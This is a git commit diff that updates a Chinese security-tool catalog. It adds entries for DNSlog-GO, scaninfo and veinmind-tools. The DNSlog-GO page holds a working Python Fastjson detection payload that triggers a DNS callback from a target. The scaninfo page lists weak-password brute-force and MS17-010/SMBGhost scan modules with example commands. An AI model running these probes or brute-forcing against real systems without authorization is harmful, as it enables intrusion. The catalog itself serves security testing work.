weekly update at 2022-03-18

pull/95/head
xx 3 years ago
parent a0616fcfbf
commit d285556f10
  1. 22
      README.md
  2. 33
      allprojects.md
  3. 128
      detail/DNSlog-GO.md
  4. 115
      detail/scaninfo.md
  5. 32
      detail/veinmind-tools.md
  6. 11
      party_a.md
  7. 15
      penetration_test.md
  8. 19
      reconnaissance.md

@ -17,6 +17,9 @@
| 时间 | 项目名称 | 项目动态 | | 时间 | 项目名称 | 项目动态 |
|----|-----------|--------------------------| |----|-----------|--------------------------|
|2022-03-16|[**veinmind-tools**](detail/veinmind-tools.md)|veinmind-tools加入星链计划|
|2022-03-16|[**DNSlog-GO**](detail/DNSlog-GO.md)|DNSlog-GO加入星链计划|
|2022-03-16|[**scaninfo**](detail/scaninfo.md)|scaninfo加入星链计划|
|2022-03-11|[**Viper**](detail/Viper.md)|更新 [v1.5.18](detail/Viper.md#最近更新) 版本| |2022-03-11|[**Viper**](detail/Viper.md)|更新 [v1.5.18](detail/Viper.md#最近更新) 版本|
|2022-03-11|[**f8x**](detail/f8x.md)|更新 [v1.6.0](detail/f8x.md#最近更新) 版本| |2022-03-11|[**f8x**](detail/f8x.md)|更新 [v1.6.0](detail/f8x.md#最近更新) 版本|
|2022-03-10|[**CDK**](detail/CDK.md)|更新 [v1.0.6](detail/CDK.md#最近更新) 版本| |2022-03-10|[**CDK**](detail/CDK.md)|更新 [v1.0.6](detail/CDK.md#最近更新) 版本|
@ -24,9 +27,6 @@
|2022-03-05|[**pocsuite3**](detail/pocsuite3.md)|更新 [v1.9.0](detail/pocsuite3.md#最近更新) 版本| |2022-03-05|[**pocsuite3**](detail/pocsuite3.md)|更新 [v1.9.0](detail/pocsuite3.md#最近更新) 版本|
|2022-03-02|[**KunLun-M**](detail/KunLun-M.md)|更新 [v2.6.4.2](detail/KunLun-M.md#最近更新) 版本| |2022-03-02|[**KunLun-M**](detail/KunLun-M.md)|更新 [v2.6.4.2](detail/KunLun-M.md#最近更新) 版本|
|2022-02-25|[**GShark**](detail/gshark.md)|更新 [v0.9.1](detail/gshark.md#最近更新) 版本| |2022-02-25|[**GShark**](detail/gshark.md)|更新 [v0.9.1](detail/gshark.md#最近更新) 版本|
|2022-02-25|[**Kunyu**](detail/Kunyu.md)|更新 [v1.6.5](detail/Kunyu.md#最近更新) 版本|
|2022-01-13|[**ct**](detail/ct.md)|更新 [v1.0.5](detail/ct.md#最近更新) 版本|
|2022-01-11|[**HaE**](detail/HaE.md)|更新 [v2.1.3](detail/HaE.md#最近更新) 版本|
**2.StarRank** **2.StarRank**
@ -62,6 +62,9 @@
| 时间 | 项目名称 | 项目简介 | | 时间 | 项目名称 | 项目简介 |
|----|-----------|--------------------------| |----|-----------|--------------------------|
|2022-03-16|[**veinmind-tools**](detail/veinmind-tools.md)|`veinmind-tools` 是基于 `veinmind-sdk` 打造的一个容器安全工具集,目前已支持镜像 恶意文件/后门/敏感信息/弱口令 的扫描,更多功能正在逐步开发中。|
|2022-03-16|[**DNSlog-GO**](detail/DNSlog-GO.md)|DNSLog-GO 是一款golang编写的监控 DNS 解析记录的工具,自带WEB界面。单文件运行,无依赖。部署方便快捷。|
|2022-03-16|[**scaninfo**](detail/scaninfo.md)|scaninfo 是一款开源、轻量、快速、跨平台的红队内外网打点扫描器。比较同类工具,其能够在 nmap 的扫描速度和 masscan 的准确度之间寻找一个较好的平衡点,能够快速进行端口扫描和服务识别,内置指纹识别用于 web 探测,可以用报告的方式整理扫描结果。|
|2021-12-13|[**ct**](detail/ct.md)|ct 是一款使用 rust 语言进行开发,并且基于ZoomEye域名查询以及利用域名字典进行子域名爆破的工具,同时在最终爆破完成后可使用脚本,将相应的的.gv 文件转化成为相应的 .png 文件进行可视化展示| |2021-12-13|[**ct**](detail/ct.md)|ct 是一款使用 rust 语言进行开发,并且基于ZoomEye域名查询以及利用域名字典进行子域名爆破的工具,同时在最终爆破完成后可使用脚本,将相应的的.gv 文件转化成为相应的 .png 文件进行可视化展示|
|2021-11-22|[**MySQL-Fake-Server**](detail/MySQL-Fake-Server.md)|用于渗透测试过程中的假MySQL服务器,纯原生python3实现,不依赖其它包。| |2021-11-22|[**MySQL-Fake-Server**](detail/MySQL-Fake-Server.md)|用于渗透测试过程中的假MySQL服务器,纯原生python3实现,不依赖其它包。|
|2021-11-22|[**BurpCrypto**](detail/BurpCrypto.md)|支持多种加密算法或直接执行JS代码的用于爆破前端加密的BurpSuite插件。| |2021-11-22|[**BurpCrypto**](detail/BurpCrypto.md)|支持多种加密算法或直接执行JS代码的用于爆破前端加密的BurpSuite插件。|
@ -69,9 +72,6 @@
|2021-11-22|[**Kunyu**](detail/Kunyu.md)|Kunyu(坤舆),是一款基于ZoomEye API开发的信息收集工具,旨在让企业资产收集更高效,使更多安全相关从业者了解、使用网络空间测绘技术。| |2021-11-22|[**Kunyu**](detail/Kunyu.md)|Kunyu(坤舆),是一款基于ZoomEye API开发的信息收集工具,旨在让企业资产收集更高效,使更多安全相关从业者了解、使用网络空间测绘技术。|
|2021-07-02|[**Pocassist**](detail/Pocassist.md)|Pocassist 是一个 Golang 编写的全新开源漏洞测试框架,帮助安全人员专注于漏洞验证的逻辑的实现。Pocassist 提供了简洁的 Web 图形化界面,用户可以在线编辑漏洞验证程序即可进行批量的测试;规则完全兼容 xray,可以直接使用现有开源的 PoC 库,同时也支持添加自定义规则。| |2021-07-02|[**Pocassist**](detail/Pocassist.md)|Pocassist 是一个 Golang 编写的全新开源漏洞测试框架,帮助安全人员专注于漏洞验证的逻辑的实现。Pocassist 提供了简洁的 Web 图形化界面,用户可以在线编辑漏洞验证程序即可进行批量的测试;规则完全兼容 xray,可以直接使用现有开源的 PoC 库,同时也支持添加自定义规则。|
|2021-07-02|[**MDUT**](detail/MDUT.md)|MDUT 全称 Multiple Database Utilization Tools,旨在将常见的数据库利用手段集合在一个程序中,打破各种数据库利用工具需要各种环境导致使用相当不便的隔阂;MDUT 使用 Java 开发,支持跨平台使用。| |2021-07-02|[**MDUT**](detail/MDUT.md)|MDUT 全称 Multiple Database Utilization Tools,旨在将常见的数据库利用手段集合在一个程序中,打破各种数据库利用工具需要各种环境导致使用相当不便的隔阂;MDUT 使用 Java 开发,支持跨平台使用。|
|2021-07-02|[**OpenStar**](detail/OpenStar.md)|OpenStar 是一个基于 OpenResty 的高性能 Web 应用防火墙,支持复杂规则编写。提供了常规的 HTTP 字段规则配置,还提供了 IP 黑白名单、访问频次等配置,对于 CC 防护更提供的特定的规则算法,并且支持搭建集群进行防护。|
|2021-07-02|[**Stowaway**](detail/Stowaway.md)|Stowaway 是一款多级代理工具,可将外部流量通过多个节点代理至内网,突破内网访问限制。Stowaway 可以方便渗透测试人员通过多级跳跃,从外部dmz等一系列区域逐步深入核心网络;Stowaway 除了流量转发功能,还提供了端口复用、ssh隧道,流量伪装等专为渗透测试人员所用的功能。|
|2021-07-02|[**Platypus**](detail/Platypus.md)|Platypus 是一个基于终端与 Web UI 交互式的反弹 Shell 会话管理工具。在实际的渗透测试中,为了解决 Netcat/Socat 等工具在文件传输、多会话管理方面的不足。该工具在多会话管理的基础上增加了在渗透测试中更加有用的功能,可以更方便灵活地对反弹 Shell 会话进行管理。|
**5.[分类:甲方工具](party_a.md)** **5.[分类:甲方工具](party_a.md)**
@ -81,6 +81,7 @@
|2|[**linglong**](detail/linglong.md)|awake1t|linglong是一款甲方资产巡航扫描系统。系统定位是发现资产,进行端口爆破。帮助企业更快发现弱口令问题。主要功能包括: 资产探测、端口爆破、定时任务、管理后台识别、报表展示。|977| |2|[**linglong**](detail/linglong.md)|awake1t|linglong是一款甲方资产巡航扫描系统。系统定位是发现资产,进行端口爆破。帮助企业更快发现弱口令问题。主要功能包括: 资产探测、端口爆破、定时任务、管理后台识别、报表展示。|977|
|3|[**GShark**](detail/gshark.md)|madneal|一款开源敏感信息监测系统,可以监测包括 github、gitlab(目前不太稳定,由于gitlab对于免费用户不提供代码全文检索API)、searchcode 多平台的敏感信息监测。|455| |3|[**GShark**](detail/gshark.md)|madneal|一款开源敏感信息监测系统,可以监测包括 github、gitlab(目前不太稳定,由于gitlab对于免费用户不提供代码全文检索API)、searchcode 多平台的敏感信息监测。|455|
|4|[**Juggler**](detail/Juggler.md)|C4o|一个也许能骗到黑客的系统,可以作为WAF等防护体系的一环。|390| |4|[**Juggler**](detail/Juggler.md)|C4o|一个也许能骗到黑客的系统,可以作为WAF等防护体系的一环。|390|
|5|[**veinmind-tools**](detail/veinmind-tools.md)|长亭科技|`veinmind-tools` 是基于 `veinmind-sdk` 打造的一个容器安全工具集,目前已支持镜像 恶意文件/后门/敏感信息/弱口令 的扫描,更多功能正在逐步开发中。|336|
**6.[分类:信息收集](reconnaissance.md)** **6.[分类:信息收集](reconnaissance.md)**
@ -91,10 +92,11 @@
|3|[**Glass**](detail/Glass.md)|s7ckTeam|Glass是一款针对资产列表的快速指纹识别工具,通过调用Fofa/ZoomEye/Shodan/360等api接口快速查询资产信息并识别重点资产的指纹,也可针对IP/IP段或资产列表进行快速的指纹识别。|569| |3|[**Glass**](detail/Glass.md)|s7ckTeam|Glass是一款针对资产列表的快速指纹识别工具,通过调用Fofa/ZoomEye/Shodan/360等api接口快速查询资产信息并识别重点资产的指纹,也可针对IP/IP段或资产列表进行快速的指纹识别。|569|
|4|[**Kunyu**](detail/Kunyu.md)|风起|Kunyu(坤舆),是一款基于ZoomEye API开发的信息收集工具,旨在让企业资产收集更高效,使更多安全相关从业者了解、使用网络空间测绘技术。|565| |4|[**Kunyu**](detail/Kunyu.md)|风起|Kunyu(坤舆),是一款基于ZoomEye API开发的信息收集工具,旨在让企业资产收集更高效,使更多安全相关从业者了解、使用网络空间测绘技术。|565|
|5|[**ZoomEye-Python**](detail/ZoomEye-Python.md)|Knownsec404|ZoomEye-python 是一款基于 ZoomEye API 开发的 Python 库,提供了 ZoomEye 命令行模式,同时也可以作为 SDK 集成到其他工具中。该库可以让技术人员更便捷地搜索、筛选、导出 ZoomEye 的数据|331| |5|[**ZoomEye-Python**](detail/ZoomEye-Python.md)|Knownsec404|ZoomEye-python 是一款基于 ZoomEye API 开发的 Python 库,提供了 ZoomEye 命令行模式,同时也可以作为 SDK 集成到其他工具中。该库可以让技术人员更便捷地搜索、筛选、导出 ZoomEye 的数据|331|
|6|[**ksubdomain**](detail/ksubdomain.md)|w8ay|ksubdomain是一款基于无状态子域名爆破工具,支持在Windows/Linux/Mac上使用,它会很快的进行DNS爆破,在Mac和Windows上理论最大发包速度在30w/s,linux上为160w/s的速度。|188| |6|[**scaninfo**](detail/scaninfo.md)|华东360安服团队|scaninfo 是一款开源、轻量、快速、跨平台的红队内外网打点扫描器。比较同类工具,其能够在 nmap 的扫描速度和 masscan 的准确度之间寻找一个较好的平衡点,能够快速进行端口扫描和服务识别,内置指纹识别用于 web 探测,可以用报告的方式整理扫描结果。|286|
|7|[**ct**](detail/ct.md)|rungobier@Knownsec404|ct 是一款使用 rust 语言进行开发,并且基于ZoomEye域名查询以及利用域名字典进行子域名爆破的工具,同时在最终爆破完成后可使用脚本,将相应的的.gv 文件转化成为相应的 .png 文件进行可视化展示|61| |7|[**ksubdomain**](detail/ksubdomain.md)|w8ay|ksubdomain是一款基于无状态子域名爆破工具,支持在Windows/Linux/Mac上使用,它会很快的进行DNS爆破,在Mac和Windows上理论最大发包速度在30w/s,linux上为160w/s的速度。|188|
|8|[**Zoomeye-Tools**](detail/ZoomEye-Tools.md)|Knownsec404|一个配合ZoomEye使用的Chrome插件,可以查看当前网页所在ip信息或跳转查看详细信息,还可以根据关键词一键跳转至ZoomEye进行搜索|31| |8|[**ct**](detail/ct.md)|rungobier@Knownsec404|ct 是一款使用 rust 语言进行开发,并且基于ZoomEye域名查询以及利用域名字典进行子域名爆破的工具,同时在最终爆破完成后可使用脚本,将相应的的.gv 文件转化成为相应的 .png 文件进行可视化展示|61|
|9|[**ZoomEye-go**](detail/ZoomEye-go.md)|gyyyy|ZoomEye-go 是一款基于 ZoomEye API 开发的 Golang 库,提供了 ZoomEye 命令行模式,同时也可以作为SDK集成到其他工具中。该库可以让技术人员更便捷地搜索、筛选、导出 ZoomEye 的数据。|27| |9|[**Zoomeye-Tools**](detail/ZoomEye-Tools.md)|Knownsec404|一个配合ZoomEye使用的Chrome插件,可以查看当前网页所在ip信息或跳转查看详细信息,还可以根据关键词一键跳转至ZoomEye进行搜索|31|
|10|[**ZoomEye-go**](detail/ZoomEye-go.md)|gyyyy|ZoomEye-go 是一款基于 ZoomEye API 开发的 Golang 库,提供了 ZoomEye 命令行模式,同时也可以作为SDK集成到其他工具中。该库可以让技术人员更便捷地搜索、筛选、导出 ZoomEye 的数据。|27|
**7.全部分类** **7.全部分类**

@ -6,6 +6,7 @@
* [linglong](#linglong) * [linglong](#linglong)
* [gshark](#gshark) * [gshark](#gshark)
* [Juggler](#juggler) * [Juggler](#juggler)
* [veinmind-tools](#veinmind-tools)
* [信息收集/reconnaissance](#信息收集reconnaissance) * [信息收集/reconnaissance](#信息收集reconnaissance)
* [AppInfoScanner](#appinfoscanner) * [AppInfoScanner](#appinfoscanner)
@ -14,6 +15,7 @@
* [Glass](#glass) * [Glass](#glass)
* [Kunyu](#kunyu) * [Kunyu](#kunyu)
* [ZoomEye-Python](#zoomeye-python) * [ZoomEye-Python](#zoomeye-python)
* [scaninfo](#scaninfo)
* [ksubdomain](#ksubdomain) * [ksubdomain](#ksubdomain)
* [ct](#ct) * [ct](#ct)
* [ZoomEye-Tools](#zoomeye-tools) * [ZoomEye-Tools](#zoomeye-tools)
@ -33,6 +35,7 @@
* [BurpCrypto](#burpcrypto) * [BurpCrypto](#burpcrypto)
* [MySQL-Fake-Server](#mysql-fake-server) * [MySQL-Fake-Server](#mysql-fake-server)
* [ysomap](#ysomap) * [ysomap](#ysomap)
* [DNSlog-GO](#dnslog-go)
* [Redis-Rogue-Server](#redis-rogue-server) * [Redis-Rogue-Server](#redis-rogue-server)
* [MysqlT](#mysqlt) * [MysqlT](#mysqlt)
@ -113,6 +116,16 @@ linglong是一款甲方资产巡航扫描系统。系统定位是发现资产,
一个也许能骗到黑客的系统,可以作为WAF等防护体系的一环。 一个也许能骗到黑客的系统,可以作为WAF等防护体系的一环。
### [veinmind-tools](detail/veinmind-tools.md)
![Author](https://img.shields.io/badge/Author-长亭科技-orange)
![Language](https://img.shields.io/badge/Language-Golang/Python-blue)
![GitHub stars](https://img.shields.io/github/stars/chaitin/veinmind-tools.svg?style=flat&logo=github)
![Version](https://img.shields.io/badge/Version-V1.0.4-red)
<https://github.com/chaitin/veinmind-tools>
`veinmind-tools` 是基于 `veinmind-sdk` 打造的一个容器安全工具集,目前已支持镜像 恶意文件/后门/敏感信息/弱口令 的扫描,更多功能正在逐步开发中。
## 信息收集/reconnaissance ## 信息收集/reconnaissance
@ -176,6 +189,16 @@ Kunyu(坤舆),是一款基于ZoomEye API开发的信息收集工具,旨在
ZoomEye-python 是一款基于 ZoomEye API 开发的 Python 库,提供了 ZoomEye 命令行模式,同时也可以作为 SDK 集成到其他工具中。该库可以让技术人员更便捷地搜索、筛选、导出 ZoomEye 的数据 ZoomEye-python 是一款基于 ZoomEye API 开发的 Python 库,提供了 ZoomEye 命令行模式,同时也可以作为 SDK 集成到其他工具中。该库可以让技术人员更便捷地搜索、筛选、导出 ZoomEye 的数据
### [scaninfo](detail/scaninfo.md)
![Author](https://img.shields.io/badge/Author-华东360安服团队-orange)
![Language](https://img.shields.io/badge/Language-Golang-blue)
![GitHub stars](https://img.shields.io/github/stars/redtoolskobe/scaninfo.svg?style=flat&logo=github)
![Version](https://img.shields.io/badge/Version-V1.1.0-red)
<https://github.com/redtoolskobe/scaninfo>
scaninfo 是一款开源、轻量、快速、跨平台的红队内外网打点扫描器。比较同类工具,其能够在 nmap 的扫描速度和 masscan 的准确度之间寻找一个较好的平衡点,能够快速进行端口扫描和服务识别,内置指纹识别用于 web 探测,可以用报告的方式整理扫描结果。
### [ksubdomain](detail/ksubdomain.md) ### [ksubdomain](detail/ksubdomain.md)
![Author](https://img.shields.io/badge/Author-w8ay-orange) ![Author](https://img.shields.io/badge/Author-w8ay-orange)
![Language](https://img.shields.io/badge/Language-Golang-blue) ![Language](https://img.shields.io/badge/Language-Golang-blue)
@ -332,6 +355,16 @@ MDUT 全称 Multiple Database Utilization Tools,旨在将常见的数据库利
Ysomap是一款适配于各类实际复杂环境的Java反序列化利用框架,可动态配置具备不同执行效果的Java反序列化利用链payload,以应对不同场景下的反序列化利用。 Ysomap是一款适配于各类实际复杂环境的Java反序列化利用框架,可动态配置具备不同执行效果的Java反序列化利用链payload,以应对不同场景下的反序列化利用。
### [DNSlog-GO](detail/DNSlog-GO.md)
![Author](https://img.shields.io/badge/Author-lanyi-orange)
![Language](https://img.shields.io/badge/Language-Golang-blue)
![GitHub stars](https://img.shields.io/github/stars/lanyi1998/DNSlog-GO.svg?style=flat&logo=github)
![Version](https://img.shields.io/badge/Version-V1.5.1-red)
<https://github.com/lanyi1998/DNSlog-GO>
DNSLog-GO 是一款golang编写的监控 DNS 解析记录的工具,自带WEB界面。单文件运行,无依赖。部署方便快捷。
### [Redis-Rogue-Server](detail/Redis-Rogue-Server.md) ### [Redis-Rogue-Server](detail/Redis-Rogue-Server.md)
![Author](https://img.shields.io/badge/Author-Dliv3-orange) ![Author](https://img.shields.io/badge/Author-Dliv3-orange)
![Language](https://img.shields.io/badge/Language-Python-blue) ![Language](https://img.shields.io/badge/Language-Python-blue)

@ -0,0 +1,128 @@
## DNSlog-GO <https://github.com/lanyi1998/DNSlog-GO>
<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
![Language](https://img.shields.io/badge/Language-Golang-blue)
![Author](https://img.shields.io/badge/Author-lanyi-orange)
![GitHub stars](https://img.shields.io/github/stars/lanyi1998/DNSlog-GO.svg?style=flat&logo=github)
![Version](https://img.shields.io/badge/Version-V1.5.1-red)
![Time](https://img.shields.io/badge/Join-20220316-green)
<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
DNSLog-GO 是一款golang编写的监控 DNS 解析记录的工具,自带多用户WEB界面
演示截图:
![avatar](https://github.com/lanyi1998/DNSlog-GO/raw/master/images/demo.png)
安装
---
详细图文教程:https://mp.weixin.qq.com/s/m_UXJa0imfOi721bkBpwFg
**个人单独使用推荐使用1.4版本 https://github.com/lanyi1998/DNSlog-GO/releases/tag/1.4**
**团队使用推荐使用 最新版**
## 1.获取发行版
这里 https://github.com/lanyi1998/DNSlog-GO/releases 下载最新发行版,并解压
## 2.域名与公网 IP 准备
```
搭建并使用 DNSLog,你需要拥有两个域名,一个域名作为 NS 服务器域名(例:a.com),一个用于记录域名(例: b.com)。还需要有一个公网 IP 地址(如:1.1.1.1)
注意:b.com 的域名提供商需要支持自定义 NS 记录, a.com 则无要求。
在 a.com 中设置两条 A 记录:
ns1.a.com A 记录指向 1.1.1.1
ns2.a.com A 记录指向 1.1.1.1
修改 b.com 的 NS 记录为 1 中设定的两个域名
本步骤中,需要在域名提供商提供的页面进行设置,部分域名提供商只允许修改 NS 记录为已经认证过的 NS 地址。所以需要找一个支持修改 NS 记录为自己 NS 的域名提供商。
注意: NS 记录修改之后部分地区需要 24-48 小时会生效
```
## 3.修改配置文件 config.ini
```
[HTTP]
Port = 8080 //http web监听端口
Token = admin1,admin2 //多个用户token,用,分割。可以团队成员一起使用了
ConsoleDisable = false //是否关闭web页面
[DNS]
Domain = demo.com //dnslog的域名
```
## 4.启动对应系统的客户端,注意服务端重启以后,必须清空一下浏览器中的localStorage,否则会获取不到数据
---
API Python Demo
```python
import requests
import random
import json
class DnsLog():
domain = ""
token = ""
Webserver = ""
def __init__(self, Webserver, token):
self.Webserver = Webserver # dnslog的http监听地址,格式为 ip:端口
self.token = token # token
# 检测DNSLog服务器是否正常
try:
res = requests.post("http://" + Webserver + "/api/verifyToken", json={"token": token}).json()
self.domain = res.Msg
except:
exit("DnsLog 服务器连接失败")
if res["Msg"] == "false":
exit("DnsLog token 验证失败")
# 生成随机子域名
def randomSubDomain(self, length=5):
subDomain = ''.join(random.sample('zyxwvutsrqponmlkjihgfedcba', length)) + '.' + self.domain
return subDomain
# 验证子域名是否存在
def checkDomain(self, domain):
res = requests.post("http://" + self.Webserver + "/api/verifyDns", json={"Query": domain},
headers={"token": self.token}).json()
if res["Msg"] == "false":
return False
else:
return True
url = "http://192.168.41.2:8090/"
dns = DnsLog("1111:8888", "admin")
subDomain = dns.randomSubDomain()
payload = {
"b": {
"@type": "java.net.Inet4Address",
"val": subDomain
}
}
requests.post(url, json=payload)
if dns.checkDomain(subDomain):
print("存在FastJosn")
```
<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
## 项目相关
## 最近更新
<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->

@ -0,0 +1,115 @@
## scaninfo <https://github.com/redtoolskobe/scaninfo>
<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
![Language](https://img.shields.io/badge/Language-Golang-blue)
![Author](https://img.shields.io/badge/Author-华东360安服团队-orange)
![GitHub stars](https://img.shields.io/github/stars/redtoolskobe/scaninfo.svg?style=flat&logo=github)
![Version](https://img.shields.io/badge/Version-V1.1.0-red)
![Time](https://img.shields.io/badge/Join-20220316-green)
<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
开源、轻量、快速、跨平台 的红队内外网打点扫描器
## 注意的点
- 漏洞扫描的时候有时候最后几个任务会卡住,是因为ftp爆破模块,这个fscan也一样目前没有好的解决办法,后续更新.先阶段可以-eq 21跳过ftp,或者control+c 主动停止不影响结果保存。
- 有时候扫外网的全端口会漏掉端口可以使用-n 指定线程为500,400,默认为900.网络好的话900-1000都是没有问题
- 关于结果报告 xlsx 文件是当你control+c 主动停止或任务正常结束时才会写入。txt文件是实时写入。
## 项目说明
> 为何有这个项目
在渗透测试的端口扫描阶段,相信很多人遇到的问题是nmap太慢,masscan不准确。难以在速度与准确度之间寻找一个平衡。 其实有个工具不错就是[TXPortMap](https://github.com/4dogs-cn/TXPortMap)。但是没有进度条当大量扫描的时候结果处理也太友好。
在内网这块[fscan](https://github.com/shadow1ng/fscan)算是一款很优秀的工具但也有一些问题,如端口扫描不支持服务识别等。
指纹这块[EHole](https://github.com/EdgeSecurityTeam/EHole)也算一款很优秀的工具
## 如何解决这个问题
- scaninfo 专门解决上述问题并对上述项目代码进行了优化与重构,快速的端口扫描和服务识别比masscan更快。
- 包含fscan的绝大部份功能除了poc扫描和自定义字典
- 更好的web探测与指纹识别
- 更好的报告输出
## 使用说明
![image-20211105132301924](https://github.com/redtoolskobe/scaninfo/raw/main/infoscan.assets/image-20211105132301924.png)
> 常见的参数
```shell
scaninfo -uf url.txt -m webfinger web指纹识别
```
```shell
scaninfo -i 192.168.0.0/24 -p 1-65535 -eq 53 -m port 端口扫描
```
```shell
scaninfo -i 192.168.0.0/24 -l ip.txt -uf url.txt -t1000 可以组合各种目标ip段ip文件url文件
```
## 报告
> 报告主要是直观的excel并对每一种类型进行分类。同时也会生成txt json格式的结果。
![image-20211105134827966](https://github.com/redtoolskobe/scaninfo/raw/main/infoscan.assets/image-20211105134827966.png)
![image-20211105134954709](https://github.com/redtoolskobe/scaninfo/raw/main/infoscan.assets/image-20211105134954709.png)
## 参数
> 主要参数
| 参数 | 说明 |
| ----- | -------------------------------- |
| -ei | 排除某IP |
| -eq | 排除某端口 |
| -l | 指定IP文件 |
| -uf | 指定要web指纹识别的url文件 |
| -ff | 指定指纹文件默认使用内置 |
| -o | 指定保存的结果文件默认为result |
| -p | 指定端口默认使用top100 |
| -m | 指定扫描的模块默认为全部 |
| -pt | 指定ping 探测存活的线程 |
| -vt | 指定web指纹扫描的线程默认500 |
| -n | 指定端口扫描的线程默认900 |
| -show | 查看扫描支持的模块 |
| -t | 端口扫描tcp连接的超时时间默认0.5 |
| -np | 跳过存活探测 |
> 模块说明
| 模块 | 说明 |
| --------- | ----------------------------------- |
| ftp | ftp弱口令探测 |
| ssh | ssh弱口令探测 |
| smb | smb弱口令探测 |
| mssql | mssql弱口令探测 |
| mysql | mysql弱口令探测 |
| mgo | mongodb弱口令探测 |
| redis | redis弱口令探测 |
| psql | psql弱口令探测 |
| ms17010 | ms17010探测 |
| smbghost | smbghost探测 |
| webfinger | web指纹识别 |
| netbios | netbios探测,可以识别主机名发现域控 |
| findnet | oxid |
| all | 所有 |
| port | 端口扫描 |
| ping | ping 存活 |
| mem | memcached弱口令 |
<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
## 项目相关
## 最近更新
<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->

@ -0,0 +1,32 @@
## veinmind-tools <https://github.com/chaitin/veinmind-tools>
<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
![Language](https://img.shields.io/badge/Language-Golang/Python-blue)
![Author](https://img.shields.io/badge/Author-长亭科技-orange)
![GitHub stars](https://img.shields.io/github/stars/chaitin/veinmind-tools.svg?style=flat&logo=github)
![Version](https://img.shields.io/badge/Version-V1.0.4-red)
![Time](https://img.shields.io/badge/Join-20220316-green)
<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
veinmind-tools 是由长亭科技自研,基于<a href="https://github.com/chaitin/libveinmind">veinmind-sdk</a>打造的容器安全工具集
## 🔥 Demo
![](https://dinfinite.oss-cn-beijing.aliyuncs.com/image/20220307110440.gif)
## 🔨 工具列表
| 工具 | 功能 |
|---|---|
| [veinmind-malicious](https://github.com/chaitin/veinmind-tools/tree/master/veinmind-malicious) | 扫描镜像中的恶意文件 |
| [veinmind-weakpass](https://github.com/chaitin/veinmind-tools/tree/master/veinmind-weakpass) | 扫描镜像中的弱口令 |
| [veinmind-sensitive](https://github.com/chaitin/veinmind-tools/tree/master/veinmind-sensitive) | 扫描镜像中的敏感信息 |
| [veinmind-backdoor](https://github.com/chaitin/veinmind-tools/tree/master/veinmind-backdoor) | 扫描镜像中的后门 |
| [veinmind-history](https://github.com/chaitin/veinmind-tools/tree/master/veinmind-history) | 扫描镜像中的异常历史命令 |
<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
## 项目相关
## 最近更新
<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->

@ -5,6 +5,7 @@
3. [linglong](#linglong) 3. [linglong](#linglong)
4. [GShark](#gshark) 4. [GShark](#gshark)
5. [Juggler](#juggler) 5. [Juggler](#juggler)
6. [veinmind-tools](#veinmind-tools)
---------------------------------------- ----------------------------------------
@ -58,3 +59,13 @@ linglong是一款甲方资产巡航扫描系统。系统定位是发现资产,
一个也许能骗到黑客的系统,可以作为WAF等防护体系的一环。 一个也许能骗到黑客的系统,可以作为WAF等防护体系的一环。
### [veinmind-tools](detail/veinmind-tools.md)
![Author](https://img.shields.io/badge/Author-长亭科技-orange)
![Language](https://img.shields.io/badge/Language-Golang/Python-blue)
![GitHub stars](https://img.shields.io/github/stars/chaitin/veinmind-tools.svg?style=flat&logo=github)
![Version](https://img.shields.io/badge/Version-V1.0.4-red)
<https://github.com/chaitin/veinmind-tools>
`veinmind-tools` 是基于 `veinmind-sdk` 打造的一个容器安全工具集,目前已支持镜像 恶意文件/后门/敏感信息/弱口令 的扫描,更多功能正在逐步开发中。

@ -7,8 +7,9 @@
5. [BurpCrypto](#burpcrypto) 5. [BurpCrypto](#burpcrypto)
6. [MySQL-Fake-Server](#mysql-fake-server) 6. [MySQL-Fake-Server](#mysql-fake-server)
7. [ysomap](#ysomap) 7. [ysomap](#ysomap)
8. [Redis-Rogue-Server](#redis-rogue-server) 8. [DNSlog-GO](#dnslog-go)
9. [MysqlT](#mysqlt) 9. [Redis-Rogue-Server](#redis-rogue-server)
10. [MysqlT](#mysqlt)
---------------------------------------- ----------------------------------------
@ -82,6 +83,16 @@ MDUT 全称 Multiple Database Utilization Tools,旨在将常见的数据库利
Ysomap是一款适配于各类实际复杂环境的Java反序列化利用框架,可动态配置具备不同执行效果的Java反序列化利用链payload,以应对不同场景下的反序列化利用。 Ysomap是一款适配于各类实际复杂环境的Java反序列化利用框架,可动态配置具备不同执行效果的Java反序列化利用链payload,以应对不同场景下的反序列化利用。
### [DNSlog-GO](detail/DNSlog-GO.md)
![Author](https://img.shields.io/badge/Author-lanyi-orange)
![Language](https://img.shields.io/badge/Language-Golang-blue)
![GitHub stars](https://img.shields.io/github/stars/lanyi1998/DNSlog-GO.svg?style=flat&logo=github)
![Version](https://img.shields.io/badge/Version-V1.5.1-red)
<https://github.com/lanyi1998/DNSlog-GO>
DNSLog-GO 是一款golang编写的监控 DNS 解析记录的工具,自带WEB界面。单文件运行,无依赖。部署方便快捷。
### [Redis-Rogue-Server](detail/Redis-Rogue-Server.md) ### [Redis-Rogue-Server](detail/Redis-Rogue-Server.md)
![Author](https://img.shields.io/badge/Author-Dliv3-orange) ![Author](https://img.shields.io/badge/Author-Dliv3-orange)
![Language](https://img.shields.io/badge/Language-Python-blue) ![Language](https://img.shields.io/badge/Language-Python-blue)

@ -6,10 +6,11 @@
4. [Glass](#glass) 4. [Glass](#glass)
5. [Kunyu](#kunyu) 5. [Kunyu](#kunyu)
6. [ZoomEye-Python](#zoomeye-python) 6. [ZoomEye-Python](#zoomeye-python)
7. [ksubdomain](#ksubdomain) 7. [scaninfo](#scaninfo)
8. [ct](#ct) 8. [ksubdomain](#ksubdomain)
9. [Zoomeye-Tools](#zoomeye-tools) 9. [ct](#ct)
10. [ZoomEye-go](#zoomeye-go) 10. [Zoomeye-Tools](#zoomeye-tools)
11. [ZoomEye-go](#zoomeye-go)
